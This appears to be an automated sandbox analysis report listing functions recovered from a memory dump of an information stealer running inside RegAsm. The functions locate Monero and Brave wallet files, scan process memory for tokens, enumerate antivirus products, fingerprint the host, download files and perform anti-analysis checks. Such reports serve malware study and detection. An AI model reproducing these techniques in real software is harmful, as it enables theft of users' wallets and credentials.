Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcatlstrlen$CloseCopyNext
String ID: Brave$F$Opera GX$Preferences$\BraveWallet\Preferences
API String ID: 704657350-2999302618
Opcode ID: 2fdd9b735f7aec4fc181650f2b725c313ab5a4168f1f17ea961b8ed24fa6f537
Instruction ID: a4fda989be0599bcb8e2ee1ea547159008252c3dc3d0dda2ce429139a213b2aa
Opcode Fuzzy Hash: 2fdd9b735f7aec4fc181650f2b725c313ab5a4168f1f17ea961b8ed24fa6f537
Instruction Fuzzy Hash: 6AE15270900249DADB14EBA5C955BDDBBB86F19304F5040AEF949B32C2DF781B4CCBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00401D90 Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 202memorystringregistryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401DC4
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401DDA
HeapAlloc.KERNEL32(00000000), ref: 00401DE1
RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,000000FF), ref: 00401DFE
RegQueryValueExA.ADVAPI32(000000FF,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401E18

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00415650: Sleep.KERNEL32(000003E8,00422AB9,fA,?,?,?,00000001), ref: 00415716
Part of subcall function 00415650: CreateThread.KERNEL32(00000000,00000000,004140D0,?,00000000,00000000), ref: 00415737
Part of subcall function 00415650: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415743

lstrcat.KERNEL32(?,00000000), ref: 00401E30
lstrlen.KERNEL32(?), ref: 00401E3D
lstrcat.KERNEL32(?,.keys), ref: 00401E58
memset.MSVCRT ref: 00401FE0

Strings

\Monero\wallet.keys, xrefs: 00401E82
wallet_path, xrefs: 00401E12
SOFTWARE\monero-project\monero-core, xrefs: 00401DF2
.keys, xrefs: 00401E4C

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heaplstrcatmemset$AllocCreateObjectOpenProcessQuerySingleSleepThreadValueWaitlstrcpylstrlen
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 1905561306-218353709
Opcode ID: 1836b18f4c90fefa574bf900dff498b3f1cb10877020fc0ecb3275706c03e4d9
Instruction ID: b7190e78a0ece566d30ab40e821a7b759709afa39e85f3d509ad0c7fbb479532
Opcode Fuzzy Hash: 1836b18f4c90fefa574bf900dff498b3f1cb10877020fc0ecb3275706c03e4d9
Instruction Fuzzy Hash: F3817F71900249EACB14EBE5DC55BEDBBB8AF19308F54416EFA05B31C2DB781608CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 0040FB80 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 200stringCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 0040FBAB
OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000), ref: 0040FBD3
strlen.MSVCRT ref: 0040FBF4
memset.MSVCRT ref: 0040FC30
ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000208,00000000), ref: 0040FC8B
strlen.MSVCRT ref: 0040FC98
strlen.MSVCRT ref: 0040FCDE
memset.MSVCRT ref: 0040FD2A

Strings

N0ZWFt, xrefs: 0040FCD9, 0040FCE9
65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040FC46, 0040FD43

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strlen$Processmemset$MemoryOpenRead
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
API String ID: 47329967-1622206642
Opcode ID: 73518393eba5e49a65edbdab016ffd258dfcd49af195929b1175e4ddf3ba23ec
Instruction ID: 21a460605aad31a862c186db400c004e6ee40eb0e1eca90a670e2fa51daa2b6d
Opcode Fuzzy Hash: 73518393eba5e49a65edbdab016ffd258dfcd49af195929b1175e4ddf3ba23ec
Instruction Fuzzy Hash: ED612171D04208AAEB30DBA1DC42BEFBA78AF80314F14413EF915776C1D77C59888BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00413EA0 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 159stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00405A30: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405AA8
Part of subcall function 00405A30: StrCmpCA.SHLWAPI(?,0152F518,?,?,?,?,?,?,00000004), ref: 00405AC0
Part of subcall function 00405A30: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405AE4
Part of subcall function 00405A30: HttpOpenRequestA.WININET(00000000,GET,?,01532148,00000000,00000000,-00400100,00000000), ref: 00405B1B
Part of subcall function 00405A30: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405B3F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413F37
lstrlen.KERNEL32(00000000), ref: 00413F4E

Part of subcall function 00411750: LocalAlloc.KERNEL32(00000040,?,00000000,00000001,00000004,?,00413F63,00000000,00000000), ref: 0041176C

StrStrA.SHLWAPI(00000000,00000000), ref: 00413F7A
lstrlen.KERNEL32(00000000), ref: 00413F8F
lstrlen.KERNEL32(00000000), ref: 00413FAC

Strings

2HA, xrefs: 00414095, 00413FD9
ERROR, xrefs: 00413FBE
ERROR, xrefs: 00413FFA
ERROR, xrefs: 00414010
ERROR, xrefs: 00414051
2HA, xrefs: 004140BB
ERROR, xrefs: 00413F29

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$Open$AllocConnectHttpLocalOptionRequest
String ID: 2HA$2HA$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 2440237315-3818902335
Opcode ID: ba1a200859b163294dc80f6353d27c9f4c925f5c19d5cf76e862733a802edbfa
Instruction ID: c74f93b79e1a96af938dd9262021b5edd6203cb7113eed4730bfd43c5734313e
Opcode Fuzzy Hash: ba1a200859b163294dc80f6353d27c9f4c925f5c19d5cf76e862733a802edbfa
Instruction Fuzzy Hash: 7E519134901249AACB11EBA5C9517DDBBA8AF19308F64407EF90573282DF7C5B48C7E6

Uniqueness

Uniqueness Score: -1.00%

Function 00411260 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 136comCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430,00000000,?,00000000,00000000), ref: 00411283
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430), ref: 00411294
CoCreateInstance.OLE32(00428D34,00000000,00000001,00428C64,?,?,00000000,?,AV: ,00000000,?,00428430,00000000,?,00000000,00000000), ref: 004112AE
CoSetProxyBlanket.OLE32(00428430,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430,00000000), ref: 004112E7
VariantInit.OLEAUT32(?), ref: 00411342

Part of subcall function 00411670: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,0041136B,?,?,00000000,?,AV: ,00000000,?,00428430,00000000,?,00000000), ref: 00411678
Part of subcall function 00411670: CharToOemW.USER32(?,00000000), ref: 00411685

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

VariantClear.OLEAUT32(?), ref: 0041137D

Strings

Select * From AntiVirusProduct, xrefs: 004112F7
Unknown, xrefs: 0041139B
root\SecurityCenter2, xrefs: 004112C6
displayName, xrefs: 00411357
Unknown, xrefs: 00411394
WQL, xrefs: 00411304

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeVariant$AllocBlanketCharClearCreateInitInstanceLocalProxySecuritylstrcpy
String ID: Select * From AntiVirusProduct$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 685420537-2776955613
Opcode ID: d780461ba901a512690bf7f16fc62c8f5d007367dc3ab2bd1b8bee44b6a6e4fb
Instruction ID: 40a9cb50dccdf73a38e95a76c9e526bc5b1cbb250bb0618e8cd6fd3f3244c3ba
Opcode Fuzzy Hash: d780461ba901a512690bf7f16fc62c8f5d007367dc3ab2bd1b8bee44b6a6e4fb
Instruction Fuzzy Hash: 6C417F71B01629ABCB20DB85DC49FEFBB78EF49B50F10421AF515A7290C7789941CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 00410860 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 210registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

RegOpenKeyExA.KERNEL32(00000000,01526398,00000000,00020019,00000000,004280BF,?,00000001), ref: 004108BF
RegEnumKeyExA.KERNEL32(00000000,?,?,00428524,00000000,00000000,00000000,00000000,?,?,00000001), ref: 0041091E
wsprintfA.USER32 ref: 00410947
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,?), ref: 00410965
RegQueryValueExA.KERNEL32(?,01531E18,00000000,000F003F,?,00000400), ref: 00410995
lstrlen.KERNEL32(?), ref: 004109AA
RegQueryValueExA.KERNEL32(?,01531D28,00000000,000F003F,?,00000400,00000000,00421E41,?,00000000,?,004280F0), ref: 00410A2E

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Strings

?, xrefs: 004108B5
%s\%s, xrefs: 00410941
- , xrefs: 00410A38

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: OpenQueryValuelstrcpy$Enumlstrlenwsprintf
String ID: - $%s\%s$?
API String ID: 1989970852-3278919252
Opcode ID: b7db24d05970cf0cf434d56626852d945b4fea331a45fae036690235d3bd5aa6
Instruction ID: 46b3b7c26f9db54fd8d8a07889e13f83e758814ada42e2adbf2fffcbf2ed9ca1
Opcode Fuzzy Hash: b7db24d05970cf0cf434d56626852d945b4fea331a45fae036690235d3bd5aa6
Instruction Fuzzy Hash: 158148B190021DABCB14DBA5DC94AEEBBB8BF59704F10816EF505B3241DB785A48CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00410D90 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 133memorystringCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410DC8
GetVolumeInformationA.KERNEL32(00421EB9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410E01
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410E4D
HeapAlloc.KERNEL32(00000000), ref: 00410E54
wsprintfA.USER32 ref: 00410E91
lstrcat.KERNEL32(00000000,00428098), ref: 00410EA0

Part of subcall function 00410D30: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410D45

lstrlen.KERNEL32(00000000), ref: 00410EC2

Part of subcall function 00411BD0: malloc.MSVCRT ref: 00411BE1
Part of subcall function 00411BD0: strncpy.MSVCRT ref: 00411BF1

lstrcat.KERNEL32(00000000,00000000), ref: 00410EF0

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Strings

:\, xrefs: 00410DF7
C, xrefs: 00410DD2

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heaplstrcat$AllocCurrentDirectoryInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
String ID: :\$C
API String ID: 2389002695-3309953409
Opcode ID: bfed51b7b5bf34afebfa62e898e320037828684205222335e9b0ccf5d3cf25f1
Instruction ID: cd9e33ec6b3912d753ff03e78be9aa97267fc370a97b6a7823d5d9fd7b56550d
Opcode Fuzzy Hash: bfed51b7b5bf34afebfa62e898e320037828684205222335e9b0ccf5d3cf25f1
Instruction Fuzzy Hash: 3C41F571900219ABDB10EBE4DC15BEEBBB9EF18704F10015EFA05B3281DB785A44C7E9

Uniqueness

Uniqueness Score: -1.00%

Function 00405850 Relevance: 15.1, APIs: 10, Instructions: 147networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004058B5
StrCmpCA.SHLWAPI(?,0152F518,?,?,?,?,?,?,0000000D), ref: 004058ED
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,-00800100,00000000), ref: 00405912
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,?,?,0000000D), ref: 00405935
InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 0040594E
WriteFile.KERNEL32(00000000,?,000000FF,004203D8,00000000,?,?,?,?,?,?,0000000D), ref: 0040596E
InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 00405998
CloseHandle.KERNEL32(00000000,?,00000400,?,?,?,?,?,?,0000000D), ref: 004059B4
InternetCloseHandle.WININET(00000000), ref: 004059BB
InternetCloseHandle.WININET(00000000), ref: 004059C2

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$File$CloseHandle$OpenRead$CrackCreateWritelstrcpylstrlen
String ID:
API String ID: 105467990-0
Opcode ID: b105dae5c726c87f236add07edf50401fe4d652777b786edf905304db798c208
Instruction ID: 13221a786792afbe71e2db2b5b3dd3a866a49aaf32af835bc09817eda76de5d3
Opcode Fuzzy Hash: b105dae5c726c87f236add07edf50401fe4d652777b786edf905304db798c208
Instruction Fuzzy Hash: 8C518F75500249EBDB10DBA0CC46FEE77B8EB05704F60416AFA01E72C1DB786A48CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004043C0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 00404412
??_U@YAPAXI@Z.MSVCRT ref: 0040441F
??_U@YAPAXI@Z.MSVCRT ref: 0040442C
lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456

Strings

zZ@, xrefs: 0040443D, 0040444D, 0040446B
<, xrefs: 00404402
zZ@, xrefs: 0040447A

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <$zZ@$zZ@
API String ID: 1274457161-2926614232
Opcode ID: 6864e4d3142b5bfb7ea21ea886150ceadebc5dbd17a9bfa196f32779abdd70b0
Instruction ID: 5ec785183fc32c623f1de6a7566c658e8ea65be6cb1651013de8fb2e27aaef0e
Opcode Fuzzy Hash: 6864e4d3142b5bfb7ea21ea886150ceadebc5dbd17a9bfa196f32779abdd70b0
Instruction Fuzzy Hash: 1C2160B5900208EBDB00DFA4D885BDD7BB8FF05724F14022AFA25A72C1DB395A45CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB50 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 368COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,0152F6A8,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040EBB0
StrCmpCA.SHLWAPI(00000000,0152F6B8,?,?,?,?,?,?,?,?,?,?,?,00000000,00421CF0,000000FF), ref: 0040EC3A
StrCmpCA.SHLWAPI(00000000,0152F678,?,?,?,?,?,?,?,?,?,?,?,00000000,00421CF0,000000FF), ref: 0040ED6A

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

StrCmpCA.SHLWAPI(00000000,0152F6A8), ref: 0040EE24
StrCmpCA.SHLWAPI(00000000,0152F6B8), ref: 0040EEB0

Strings

Stable\, xrefs: 0040EEF3
Stable\, xrefs: 0040EC7D

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: Stable\$ Stable\
API String ID: 3722407311-4033978473
Opcode ID: f54e906f9e69dee7ad1047260745225b443c7ea696a6296acf4938656316a391
Instruction ID: d8ce4b8c1e13b8f110d5154c309a70af36248a3d2e26b75c81aeb3fa987dec21
Opcode Fuzzy Hash: f54e906f9e69dee7ad1047260745225b443c7ea696a6296acf4938656316a391
Instruction Fuzzy Hash: E4E1CA70900248DBCB14EFA9C946BDDBBB5AF59304F10C16EF945A7382DB785608C7E6

Uniqueness

Uniqueness Score: -1.00%

Function 00418860 Relevance: 10.6, APIs: 7, Instructions: 72sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00418970: LoadLibraryA.KERNEL32(kernel32.dll,0041887A), ref: 00418975
Part of subcall function 00418970: GetProcAddress.KERNEL32(00000000,0151F240), ref: 00418990
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,0151F198), ref: 004189BD
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,0151F1C8), ref: 004189D6
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,0151F210), ref: 004189EE
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,0151F540), ref: 00418A06
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,01522E60), ref: 00418A1F
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,015225C0), ref: 00418A37
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,015228C0), ref: 00418A4F
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,0151F4C8), ref: 00418A68
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,0151F498), ref: 00418A80
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,0151F4E0), ref: 00418A98
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,0151F528), ref: 00418AB1
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,01522660), ref: 00418AC9
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,0151F4F8), ref: 00418AE1
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,0151F510), ref: 00418AFA

Part of subcall function 00401050: strcmp.MSVCRT ref: 0040105C
Part of subcall function 00401050: strcmp.MSVCRT ref: 00401075
Part of subcall function 00401050: ExitProcess.KERNEL32 ref: 00401082

Part of subcall function 00401090: CreateDCA.GDI32(01522EA0,00000000,00000000,00000000), ref: 0040109D
Part of subcall function 00401090: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004010A8
Part of subcall function 00401090: ReleaseDC.USER32(00000000,00000000), ref: 004010B1

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410280: GetProcessHeap.KERNEL32(00000000,00000104,?,01522DE0,?,00401074,01522DE0,?,0041887F), ref: 0041028C
Part of subcall function 00410280: HeapAlloc.KERNEL32(00000000,?,01522DE0,?,00401074,01522DE0,?,0041887F), ref: 00410293
Part of subcall function 00410280: GetUserNameA.ADVAPI32(00000000,01522DE0), ref: 004102A7

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01522DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01522DE0,?,00428884,?,00000000,004283B2), ref: 004188F6
CloseHandle.KERNEL32(00000000), ref: 00418901
Sleep.KERNEL32(00001B58), ref: 0041890C
OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 00418922
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041893C
CloseHandle.KERNEL32(00000000), ref: 0041894A
ExitProcess.KERNEL32 ref: 00418952

Memory Dump Source

